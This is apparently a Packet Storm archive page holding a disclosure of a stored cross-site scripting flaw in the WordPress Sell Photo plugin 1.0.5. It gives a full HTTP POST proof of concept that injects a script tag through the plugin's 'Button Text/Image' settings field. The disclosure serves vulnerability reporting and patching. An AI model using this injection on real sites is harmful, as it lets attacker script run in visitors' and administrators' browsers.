what you don't know can hurt you

WordPress Sell Photo 1.0.5 Cross Site Scripting

WordPress Sell Photo 1.0.5 Cross Site Scripting
Posted Aug 14, 2020
Authored by Melbin K Mathew

WordPress Sell Photo plugin version 1.0.5 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 1a714e3248c38301676f7bf12545b443

WordPress Sell Photo 1.0.5 Cross Site Scripting

Change Mirror Download
# Exploit Title: Sell Photo Wordpress Plugin v1.0.5 - Persistent Cross-Site Scripting
# Date: 2020-08-14
# Vendor Homepage: https://noorsplugin.com/
# Vendor Changelog: https://wordpress.org/plugins/sell-photo/#developers
# Exploit Author: Melbin K Mathew (@melbinkm)
# Author Advisory: https://melbin.in/2020/08/14/stored-xss-vulnerability-in-wordpress-sell-photo-plugin/
# Author Homepage: https://melbin.in
# Version: 1.0.5 and below

1. Description

The Sell Photo by naa986 is a WordPress Plugin used to sell images from WordPress Blogs with payment through PayPal. The 'Button Text/Image' field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin. All WordPress websites using Sell Photo by naa986 version 1.0.5 and below are affected.

2. Proof of Concept

POST /w/wp-admin/options-general.php?page=sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 339
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

_wpnonce=14d5bbccf9&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dsell-photo-settings&enable_testmode=1&paypal_email=jajaja%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&sell_photo_update_settings=Save+Changes
Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close